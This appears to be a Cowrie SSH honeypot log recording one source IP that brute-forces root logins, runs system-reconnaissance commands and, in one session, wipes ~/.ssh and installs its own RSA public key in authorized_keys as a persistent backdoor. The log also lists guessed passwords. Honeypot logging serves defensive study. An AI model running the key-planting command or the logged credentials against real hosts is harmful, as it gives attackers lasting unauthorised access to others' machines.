{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:48.277985Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T05:02:48.278722Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:48.548450Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:49.177269Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T05:02:49.178240Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":26,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:49.448268Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:50.042303Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T05:02:50.043107Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T05:02:50.043753Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:50.314742Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:50.869055Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T05:02:50.869744Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:51.139417Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:51.784169Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T05:02:51.784979Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:52.055256Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:52.651890Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T05:02:52.652860Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:52.922209Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:53.476815Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T05:02:53.477530Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:53.747401Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:54.379224Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T05:02:54.380169Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:54.649840Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:55.204211Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T05:02:55.205013Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:55.474439Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:56.101346Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T05:02:56.102034Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:56.371940Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:56.975074Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T05:02:56.975952Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:57.245713Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:57.799810Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T05:02:57.800459Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:58.070177Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:58.715528Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T05:02:58.716293Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:58.987940Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.closed","duration":"25.6","message":"Connection lost after 25.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:58.989290Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45004,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad3b08e2a3a4","protocol":"ssh","message":"New connection: 212.227.235.229:45004 (1.2.3.4:22) [session: ad3b08e2a3a4]","sensor":"my-vps","timestamp":"2025-08-26T05:03:25.455845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:25.456948Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:26.667465Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Wb123456","message":"login attempt [root/Wb123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:03:27.405901Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:03:27.917941Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:03:27.918691Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:03:27.919850Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:28.167143Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:03:29.268593Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:03:29.269235Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:03:29.516623Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:29.517511Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48314,"dst_ip":"1.2.3.4","dst_port":22,"session":"57447812ad08","protocol":"ssh","message":"New connection: 212.227.235.229:48314 (1.2.3.4:22) [session: 57447812ad08]","sensor":"my-vps","timestamp":"2025-08-26T05:03:29.760464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:29.761605Z","src_ip":"212.227.235.229","session":"57447812ad08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:30.954300Z","src_ip":"212.227.235.229","session":"57447812ad08"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:03:31.688789Z","src_ip":"212.227.235.229","session":"57447812ad08"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:32.936021Z","src_ip":"212.227.235.229","session":"57447812ad08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48320,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14c299ab175","protocol":"ssh","message":"New connection: 212.227.235.229:48320 (1.2.3.4:22) [session: e14c299ab175]","sensor":"my-vps","timestamp":"2025-08-26T05:03:33.185162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:33.186083Z","src_ip":"212.227.235.229","session":"e14c299ab175"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:34.384242Z","src_ip":"212.227.235.229","session":"e14c299ab175"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:03:35.127766Z","src_ip":"212.227.235.229","session":"e14c299ab175"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:35.373428Z","src_ip":"212.227.235.229","session":"ad3b08e2a3a4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:03:35.375965Z","src_ip":"212.227.235.229","session":"e14c299ab175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40654,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3c59d35477","protocol":"ssh","message":"New connection: 212.227.235.229:40654 (1.2.3.4:22) [session: 8e3c59d35477]","sensor":"my-vps","timestamp":"2025-08-26T05:03:52.030413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:03:52.031543Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:03:52.300923Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:03:53.421391Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:03:54.023075Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:03:54.023882Z","src_ip":"212.227.235.229","session":"8e3c59d35477"}
